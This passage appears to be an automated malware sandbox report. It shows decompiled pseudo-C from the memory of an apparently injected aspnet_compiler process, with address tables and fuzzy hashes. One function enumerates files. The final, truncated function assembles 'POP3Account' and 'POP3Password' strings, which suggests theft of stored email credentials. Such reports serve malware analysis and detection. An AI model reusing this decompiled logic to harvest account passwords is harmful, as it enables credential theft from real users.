                                                                                                                                                                                                                                                                  				intOrPtr _t112;
                                                                                                                                                                                                                                                                  				void* _t113;
                                                                                                                                                                                                                                                                  				signed int _t118;
                                                                                                                                                                                                                                                                  				void* _t119;
                                                                                                                                                                                                                                                                  				signed int _t120;
                                                                                                                                                                                                                                                                  				void* _t121;
                                                                                                                                                                                                                                                                  				void* _t122;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                                                                                                                  				_t83 = _a4;
                                                                                                                                                                                                                                                                  				_t2 = _t83 + 1; // 0x1
                                                                                                                                                                                                                                                                  				_t101 = _t2;
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					_t35 =  *_t83;
                                                                                                                                                                                                                                                                  					_t83 = _t83 + 1;
                                                                                                                                                                                                                                                                  				} while (_t35 != 0);
                                                                                                                                                                                                                                                                  				_push(__edi);
                                                                                                                                                                                                                                                                  				_t105 = _a12;
                                                                                                                                                                                                                                                                  				_t85 = _t83 - _t101 + 1;
                                                                                                                                                                                                                                                                  				_v8 = _t85;
                                                                                                                                                                                                                                                                  				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
                                                                                                                                                                                                                                                                  					_push(__ebx);
                                                                                                                                                                                                                                                                  					_push(__esi);
                                                                                                                                                                                                                                                                  					_t5 = _t105 + 1; // 0x1
                                                                                                                                                                                                                                                                  					_t78 = _t5 + _t85;
                                                                                                                                                                                                                                                                  					_t111 = E1000637B(_t85, _t78, 1);
                                                                                                                                                                                                                                                                  					_pop(_t87);
                                                                                                                                                                                                                                                                  					__eflags = _t105;
                                                                                                                                                                                                                                                                  					if(_t105 == 0) {
                                                                                                                                                                                                                                                                  						L6:
                                                                                                                                                                                                                                                                  						_push(_v8);
                                                                                                                                                                                                                                                                  						_t78 = _t78 - _t105;
                                                                                                                                                                                                                                                                  						_t40 = E100085EB(_t87, _t111 + _t105, _t78, _a4);
                                                                                                                                                                                                                                                                  						_t120 = _t119 + 0x10;
                                                                                                                                                                                                                                                                  						__eflags = _t40;
                                                                                                                                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                                                                                                                                  							goto L9;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_t72 = E100067BF(_a16, __eflags, _t111);
                                                                                                                                                                                                                                                                  							E1000571E(0);
                                                                                                                                                                                                                                                                  							_t74 = _t72;
                                                                                                                                                                                                                                                                  							goto L8;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_push(_t105);
                                                                                                                                                                                                                                                                  						_t75 = E100085EB(_t87, _t111, _t78, _a8);
                                                                                                                                                                                                                                                                  						_t120 = _t119 + 0x10;
                                                                                                                                                                                                                                                                  						__eflags = _t75;
                                                                                                                                                                                                                                                                  						if(_t75 != 0) {
                                                                                                                                                                                                                                                                  							L9:
                                                                                                                                                                                                                                                                  							_push(0);
                                                                                                                                                                                                                                                                  							_push(0);
                                                                                                                                                                                                                                                                  							_push(0);
                                                                                                                                                                                                                                                                  							_push(0);
                                                                                                                                                                                                                                                                  							_push(0);
                                                                                                                                                                                                                                                                  							E100062BC(0);
                                                                                                                                                                                                                                                                  							asm("int3");
                                                                                                                                                                                                                                                                  							_t118 = _t120;
                                                                                                                                                                                                                                                                  							_t121 = _t120 - 0x150;
                                                                                                                                                                                                                                                                  							_t43 =  *0x10013014; // 0xf4aa7632
                                                                                                                                                                                                                                                                  							_v48 = _t43 ^ _t118;
                                                                                                                                                                                                                                                                  							_t88 = _v32;
                                                                                                                                                                                                                                                                  							_push(_t78);
                                                                                                                                                                                                                                                                  							_t79 = _v36;
                                                                                                                                                                                                                                                                  							_push(_t111);
                                                                                                                                                                                                                                                                  							_t112 = _v28;
                                                                                                                                                                                                                                                                  							_push(_t105);
                                                                                                                                                                                                                                                                  							_v372 = _t112;
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								__eflags = _t88 - _t79;
                                                                                                                                                                                                                                                                  								if(_t88 == _t79) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t45 =  *_t88;
                                                                                                                                                                                                                                                                  								__eflags = _t45 - 0x2f;
                                                                                                                                                                                                                                                                  								if(_t45 != 0x2f) {
                                                                                                                                                                                                                                                                  									__eflags = _t45 - 0x5c;
                                                                                                                                                                                                                                                                  									if(_t45 != 0x5c) {
                                                                                                                                                                                                                                                                  										__eflags = _t45 - 0x3a;
                                                                                                                                                                                                                                                                  										if(_t45 != 0x3a) {
                                                                                                                                                                                                                                                                  											_t88 = E10008640(_t79, _t88);
                                                                                                                                                                                                                                                                  											continue;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t102 =  *_t88;
                                                                                                                                                                                                                                                                  							__eflags = _t102 - 0x3a;
                                                                                                                                                                                                                                                                  							if(_t102 != 0x3a) {
                                                                                                                                                                                                                                                                  								L19:
                                                                                                                                                                                                                                                                  								_t106 = 0;
                                                                                                                                                                                                                                                                  								__eflags = _t102 - 0x2f;
                                                                                                                                                                                                                                                                  								if(_t102 == 0x2f) {
                                                                                                                                                                                                                                                                  									L23:
                                                                                                                                                                                                                                                                  									_t47 = 1;
                                                                                                                                                                                                                                                                  									__eflags = 1;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									__eflags = _t102 - 0x5c;
                                                                                                                                                                                                                                                                  									if(_t102 == 0x5c) {
                                                                                                                                                                                                                                                                  										goto L23;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										__eflags = _t102 - 0x3a;
                                                                                                                                                                                                                                                                  										if(_t102 == 0x3a) {
                                                                                                                                                                                                                                                                  											goto L23;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											_t47 = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t90 = _t88 - _t79 + 1;
                                                                                                                                                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
                                                                                                                                                                                                                                                                  								E10002C40(_t106,  &_v332, _t106, 0x140);
                                                                                                                                                                                                                                                                  								_t122 = _t121 + 0xc;
                                                                                                                                                                                                                                                                  								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
                                                                                                                                                                                                                                                                  								_t55 = _v336;
                                                                                                                                                                                                                                                                  								__eflags = _t113 - 0xffffffff;
                                                                                                                                                                                                                                                                  								if(_t113 != 0xffffffff) {
                                                                                                                                                                                                                                                                  									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                                                                                                                                                                                                                                                                  									__eflags = _t92;
                                                                                                                                                                                                                                                                  									_t93 = _t92 >> 2;
                                                                                                                                                                                                                                                                  									_v344 = _t92 >> 2;
                                                                                                                                                                                                                                                                  									do {
                                                                                                                                                                                                                                                                  										__eflags = _v288 - 0x2e;
                                                                                                                                                                                                                                                                  										if(_v288 != 0x2e) {
                                                                                                                                                                                                                                                                  											L36:
                                                                                                                                                                                                                                                                  											_push(_t55);
                                                                                                                                                                                                                                                                  											_t57 = E10006580(_t79, _t93, _t106, _t113,  &_v288, _t79, _v340);
                                                                                                                                                                                                                                                                  											_t122 = _t122 + 0x10;
                                                                                                                                                                                                                                                                  											__eflags = _t57;
                                                                                                                                                                                                                                                                  											if(_t57 != 0) {
                                                                                                                                                                                                                                                                  												goto L26;
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												goto L37;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											_t93 = _v287;
                                                                                                                                                                                                                                                                  											__eflags = _t93;
                                                                                                                                                                                                                                                                  											if(_t93 == 0) {
                                                                                                                                                                                                                                                                  												goto L37;
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												__eflags = _t93 - 0x2e;
                                                                                                                                                                                                                                                                  												if(_t93 != 0x2e) {
                                                                                                                                                                                                                                                                  													goto L36;
                                                                                                                                                                                                                                                                  												} else {
                                                                                                                                                                                                                                                                  													__eflags = _v286;
                                                                                                                                                                                                                                                                  													if(_v286 == 0) {
                                                                                                                                                                                                                                                                  														goto L37;
                                                                                                                                                                                                                                                                  													} else {
                                                                                                                                                                                                                                                                  														goto L36;
                                                                                                                                                                                                                                                                  													}
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L40;
                                                                                                                                                                                                                                                                  										L37:
                                                                                                                                                                                                                                                                  										_t62 =  *0x1000d0d0(_t113,  &_v332);
                                                                                                                                                                                                                                                                  										__eflags = _t62;
                                                                                                                                                                                                                                                                  										_t55 = _v336;
                                                                                                                                                                                                                                                                  									} while (_t62 != 0);
                                                                                                                                                                                                                                                                  									_t103 =  *_t55;
                                                                                                                                                                                                                                                                  									_t96 = _v344;
                                                                                                                                                                                                                                                                  									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                                                                                                                                                                                                                                                                  									__eflags = _t96 - _t65;
                                                                                                                                                                                                                                                                  									if(_t96 != _t65) {
                                                                                                                                                                                                                                                                  										E100081A0(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E100063D8);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_push(_t55);
                                                                                                                                                                                                                                                                  									_t57 = E10006580(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
                                                                                                                                                                                                                                                                  									L26:
                                                                                                                                                                                                                                                                  									_t106 = _t57;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__eflags = _t113 - 0xffffffff;
                                                                                                                                                                                                                                                                  								if(_t113 != 0xffffffff) {
                                                                                                                                                                                                                                                                  									 *0x1000d010(_t113);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								__eflags = _t88 -  &(_t79[1]);
                                                                                                                                                                                                                                                                  								if(_t88 ==  &(_t79[1])) {
                                                                                                                                                                                                                                                                  									goto L19;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_push(_t112);
                                                                                                                                                                                                                                                                  									E10006580(_t79, _t88, 0, _t112, _t79, 0, 0);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _v12 ^ _t118;
                                                                                                                                                                                                                                                                  							return E10002ADA(_v12 ^ _t118);
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							goto L6;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t74 = 0xc;
                                                                                                                                                                                                                                                                  					L8:
                                                                                                                                                                                                                                                                  					return _t74;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L40:
                                                                                                                                                                                                                                                                  			}

















































                                                                                                                                                                                                                                                                  0x10006585
                                                                                                                                                                                                                                                                  0x10006586
                                                                                                                                                                                                                                                                  0x10006589
                                                                                                                                                                                                                                                                  0x10006589
                                                                                                                                                                                                                                                                  0x1000658c
                                                                                                                                                                                                                                                                  0x1000658c
                                                                                                                                                                                                                                                                  0x1000658e
                                                                                                                                                                                                                                                                  0x1000658f
                                                                                                                                                                                                                                                                  0x10006598
                                                                                                                                                                                                                                                                  0x10006599
                                                                                                                                                                                                                                                                  0x1000659c
                                                                                                                                                                                                                                                                  0x1000659f
                                                                                                                                                                                                                                                                  0x100065a4
                                                                                                                                                                                                                                                                  0x100065ab
                                                                                                                                                                                                                                                                  0x100065ac
                                                                                                                                                                                                                                                                  0x100065ad
                                                                                                                                                                                                                                                                  0x100065b0
                                                                                                                                                                                                                                                                  0x100065ba
                                                                                                                                                                                                                                                                  0x100065bd
                                                                                                                                                                                                                                                                  0x100065be
                                                                                                                                                                                                                                                                  0x100065c0
                                                                                                                                                                                                                                                                  0x100065d4
                                                                                                                                                                                                                                                                  0x100065d4
                                                                                                                                                                                                                                                                  0x100065d7
                                                                                                                                                                                                                                                                  0x100065e1
                                                                                                                                                                                                                                                                  0x100065e6
                                                                                                                                                                                                                                                                  0x100065e9
                                                                                                                                                                                                                                                                  0x100065eb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100065ed
                                                                                                                                                                                                                                                                  0x100065f1
                                                                                                                                                                                                                                                                  0x100065fa
                                                                                                                                                                                                                                                                  0x10006600
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10006603
                                                                                                                                                                                                                                                                  0x100065c2
                                                                                                                                                                                                                                                                  0x100065c2
                                                                                                                                                                                                                                                                  0x100065c8
                                                                                                                                                                                                                                                                  0x100065cd
                                                                                                                                                                                                                                                                  0x100065d0
                                                                                                                                                                                                                                                                  0x100065d2
                                                                                                                                                                                                                                                                  0x10006609
                                                                                                                                                                                                                                                                  0x1000660b
                                                                                                                                                                                                                                                                  0x1000660c
                                                                                                                                                                                                                                                                  0x1000660d
                                                                                                                                                                                                                                                                  0x1000660e
                                                                                                                                                                                                                                                                  0x1000660f
                                                                                                                                                                                                                                                                  0x10006610
                                                                                                                                                                                                                                                                  0x10006615
                                                                                                                                                                                                                                                                  0x10006619
                                                                                                                                                                                                                                                                  0x1000661b
                                                                                                                                                                                                                                                                  0x10006621
                                                                                                                                                                                                                                                                  0x10006628
                                                                                                                                                                                                                                                                  0x1000662b
                                                                                                                                                                                                                                                                  0x1000662e
                                                                                                                                                                                                                                                                  0x1000662f
                                                                                                                                                                                                                                                                  0x10006632
                                                                                                                                                                                                                                                                  0x10006633
                                                                                                                                                                                                                                                                  0x10006636
                                                                                                                                                                                                                                                                  0x10006637
                                                                                                                                                                                                                                                                  0x10006658
                                                                                                                                                                                                                                                                  0x10006658
                                                                                                                                                                                                                                                                  0x1000665a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000663f
                                                                                                                                                                                                                                                                  0x10006641
                                                                                                                                                                                                                                                                  0x10006643
                                                                                                                                                                                                                                                                  0x10006645
                                                                                                                                                                                                                                                                  0x10006647
                                                                                                                                                                                                                                                                  0x10006649
                                                                                                                                                                                                                                                                  0x1000664b
                                                                                                                                                                                                                                                                  0x10006656
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10006656
                                                                                                                                                                                                                                                                  0x1000664b
                                                                                                                                                                                                                                                                  0x10006647
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10006643
                                                                                                                                                                                                                                                                  0x1000665c
                                                                                                                                                                                                                                                                  0x1000665e
                                                                                                                                                                                                                                                                  0x10006661
                                                                                                                                                                                                                                                                  0x1000667a
                                                                                                                                                                                                                                                                  0x1000667a
                                                                                                                                                                                                                                                                  0x1000667c
                                                                                                                                                                                                                                                                  0x1000667f
                                                                                                                                                                                                                                                                  0x1000668f
                                                                                                                                                                                                                                                                  0x10006691
                                                                                                                                                                                                                                                                  0x10006691
                                                                                                                                                                                                                                                                  0x10006681
                                                                                                                                                                                                                                                                  0x10006681
                                                                                                                                                                                                                                                                  0x10006684
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10006686
                                                                                                                                                                                                                                                                  0x10006686
                                                                                                                                                                                                                                                                  0x10006689
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000668b
                                                                                                                                                                                                                                                                  0x1000668b
                                                                                                                                                                                                                                                                  0x1000668b
                                                                                                                                                                                                                                                                  0x10006689
                                                                                                                                                                                                                                                                  0x10006684
                                                                                                                                                                                                                                                                  0x10006697
                                                                                                                                                                                                                                                                  0x1000669f
                                                                                                                                                                                                                                                                  0x100066a3
                                                                                                                                                                                                                                                                  0x100066b1
                                                                                                                                                                                                                                                                  0x100066b6
                                                                                                                                                                                                                                                                  0x100066cb
                                                                                                                                                                                                                                                                  0x100066cd
                                                                                                                                                                                                                                                                  0x100066d3
                                                                                                                                                                                                                                                                  0x100066d6
                                                                                                                                                                                                                                                                  0x10006708
                                                                                                                                                                                                                                                                  0x10006708
                                                                                                                                                                                                                                                                  0x1000670a
                                                                                                                                                                                                                                                                  0x1000670d
                                                                                                                                                                                                                                                                  0x10006713
                                                                                                                                                                                                                                                                  0x10006713
                                                                                                                                                                                                                                                                  0x1000671a
                                                                                                                                                                                                                                                                  0x10006734
                                                                                                                                                                                                                                                                  0x10006734
                                                                                                                                                                                                                                                                  0x10006743
                                                                                                                                                                                                                                                                  0x10006748
                                                                                                                                                                                                                                                                  0x1000674b
                                                                                                                                                                                                                                                                  0x1000674d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000671c
                                                                                                                                                                                                                                                                  0x1000671c
                                                                                                                                                                                                                                                                  0x10006722
                                                                                                                                                                                                                                                                  0x10006724
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10006726
                                                                                                                                                                                                                                                                  0x10006726
                                                                                                                                                                                                                                                                  0x10006729
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000672b
                                                                                                                                                                                                                                                                  0x1000672b
                                                                                                                                                                                                                                                                  0x10006732
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10006732
                                                                                                                                                                                                                                                                  0x10006729
                                                                                                                                                                                                                                                                  0x10006724
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000674f
                                                                                                                                                                                                                                                                  0x10006757
                                                                                                                                                                                                                                                                  0x1000675d
                                                                                                                                                                                                                                                                  0x1000675f
                                                                                                                                                                                                                                                                  0x1000675f
                                                                                                                                                                                                                                                                  0x10006767
                                                                                                                                                                                                                                                                  0x1000676c
                                                                                                                                                                                                                                                                  0x10006774
                                                                                                                                                                                                                                                                  0x10006777
                                                                                                                                                                                                                                                                  0x10006779
                                                                                                                                                                                                                                                                  0x1000678d
                                                                                                                                                                                                                                                                  0x10006792
                                                                                                                                                                                                                                                                  0x100066d8
                                                                                                                                                                                                                                                                  0x100066d8
                                                                                                                                                                                                                                                                  0x100066dc
                                                                                                                                                                                                                                                                  0x100066e4
                                                                                                                                                                                                                                                                  0x100066e4
                                                                                                                                                                                                                                                                  0x100066e4
                                                                                                                                                                                                                                                                  0x100066e6
                                                                                                                                                                                                                                                                  0x100066e9
                                                                                                                                                                                                                                                                  0x100066ec
                                                                                                                                                                                                                                                                  0x100066ec
                                                                                                                                                                                                                                                                  0x10006663
                                                                                                                                                                                                                                                                  0x10006666
                                                                                                                                                                                                                                                                  0x10006668
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000666a
                                                                                                                                                                                                                                                                  0x1000666a
                                                                                                                                                                                                                                                                  0x10006670
                                                                                                                                                                                                                                                                  0x10006675
                                                                                                                                                                                                                                                                  0x10006668
                                                                                                                                                                                                                                                                  0x100066f9
                                                                                                                                                                                                                                                                  0x10006704
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100065d2
                                                                                                                                                                                                                                                                  0x100065a6
                                                                                                                                                                                                                                                                  0x100065a8
                                                                                                                                                                                                                                                                  0x10006604
                                                                                                                                                                                                                                                                  0x10006608
                                                                                                                                                                                                                                                                  0x10006608
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                                                                                  • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                                                                                                  • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E1000724E() {
                                                                                                                                                                                                                                                                  				signed int _t3;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t3 = GetProcessHeap();
                                                                                                                                                                                                                                                                  				 *0x10013f90 = _t3;
                                                                                                                                                                                                                                                                  				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                                                                                                                                                                                                                  			}




                                                                                                                                                                                                                                                                  0x1000724e
                                                                                                                                                                                                                                                                  0x10007256
                                                                                                                                                                                                                                                                  0x1000725e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                                  • Opcode ID: 74528a86ea23c496de08825dc3a4a40a2c2b398e62092c8ef664648e47626679
                                                                                                                                                                                                                                                                  • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74528a86ea23c496de08825dc3a4a40a2c2b398e62092c8ef664648e47626679
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                                                                                                                  			E1000173A(intOrPtr __ecx, void* __edx) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				char _v12;
                                                                                                                                                                                                                                                                  				int _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				char _v40;
                                                                                                                                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                                                                                                                                  				intOrPtr _v48;
                                                                                                                                                                                                                                                                  				char _v52;
                                                                                                                                                                                                                                                                  				void* _v73;
                                                                                                                                                                                                                                                                  				char _v74;
                                                                                                                                                                                                                                                                  				short _v76;
                                                                                                                                                                                                                                                                  				intOrPtr _v80;
                                                                                                                                                                                                                                                                  				char _v84;
                                                                                                                                                                                                                                                                  				void _v108;
                                                                                                                                                                                                                                                                  				intOrPtr _v112;
                                                                                                                                                                                                                                                                  				char _v116;
                                                                                                                                                                                                                                                                  				void _v141;
                                                                                                                                                                                                                                                                  				char _v142;
                                                                                                                                                                                                                                                                  				short _v144;
                                                                                                                                                                                                                                                                  				char _v148;
                                                                                                                                                                                                                                                                  				char _v408;
                                                                                                                                                                                                                                                                  				char _v10408;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                                                                                                                  				char* _t71;
                                                                                                                                                                                                                                                                  				void* _t80;
                                                                                                                                                                                                                                                                  				intOrPtr _t81;
                                                                                                                                                                                                                                                                  				void* _t85;
                                                                                                                                                                                                                                                                  				void* _t88;
                                                                                                                                                                                                                                                                  				char* _t101;
                                                                                                                                                                                                                                                                  				signed int _t104;
                                                                                                                                                                                                                                                                  				signed int _t109;
                                                                                                                                                                                                                                                                  				intOrPtr _t114;
                                                                                                                                                                                                                                                                  				void* _t138;
                                                                                                                                                                                                                                                                  				void* _t146;
                                                                                                                                                                                                                                                                  				void* _t148;
                                                                                                                                                                                                                                                                  				char* _t150;
                                                                                                                                                                                                                                                                  				void* _t151;
                                                                                                                                                                                                                                                                  				void* _t154;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				0x1000c030();
                                                                                                                                                                                                                                                                  				_push(_t138);
                                                                                                                                                                                                                                                                  				_v20 = __ecx;
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_t148 = __edx;
                                                                                                                                                                                                                                                                  				E10002C40(_t138,  &_v408, 0, 0x104);
                                                                                                                                                                                                                                                                  				E10002C40(_t138,  &_v10408, 0, 0x2710);
                                                                                                                                                                                                                                                                  				_v148 = 0x6f636341;
                                                                                                                                                                                                                                                                  				_v144 = 0x6e75;
                                                                                                                                                                                                                                                                  				_v142 = 0x74;
                                                                                                                                                                                                                                                                  				_v84 = 0x33504f50;
                                                                                                                                                                                                                                                                  				_v80 = 0x6f636341;
                                                                                                                                                                                                                                                                  				_t104 = 6;
                                                                                                                                                                                                                                                                  				memset( &_v141, 0, _t104 << 2);
                                                                                                                                                                                                                                                                  				_push(6);
                                                                                                                                                                                                                                                                  				_v76 = 0x6e75;
                                                                                                                                                                                                                                                                  				asm("stosb");
                                                                                                                                                                                                                                                                  				_v74 = 0x74;
                                                                                                                                                                                                                                                                  				_v116 = 0x73736150;
                                                                                                                                                                                                                                                                  				_v112 = 0x64726f77;
                                                                                                                                                                                                                                                                  				memset( &_v108, 0, 0 << 2);
                                                                                                                                                                                                                                                                  				_t154 = _t151 + 0x30;
                                                                                                                                                                                                                                                                  				_v52 = 0x33504f50;
                                                                                                                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                                                                                                                  				_t108 = _t148;
                                                                                                                                                                                                                                                                  				_v48 = 0x73736150;
                                                                                                                                                                                                                                                                  				_v44 = 0x64726f77;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                                                                                                                  				asm("stosb");
                                                                                                                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                                                                                                                  				_t71 = E10001CCA(_t148,  &_v8,  &_v40);
                                                                                                                                                                                                                                                                  				_t101 = _t71;
                                                                                                                                                                                                                                                                  				if(_t101 != 0) {
                                                                                                                                                                                                                                                                  					_t156 = _v8;
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						_push(_v8);
                                                                                                                                                                                                                                                                  						_t150 = E10001EDE(_t108, _t148, _t156);
                                                                                                                                                                                                                                                                  						_pop(_t109);
                                                                                                                                                                                                                                                                  						_t146 = 0;
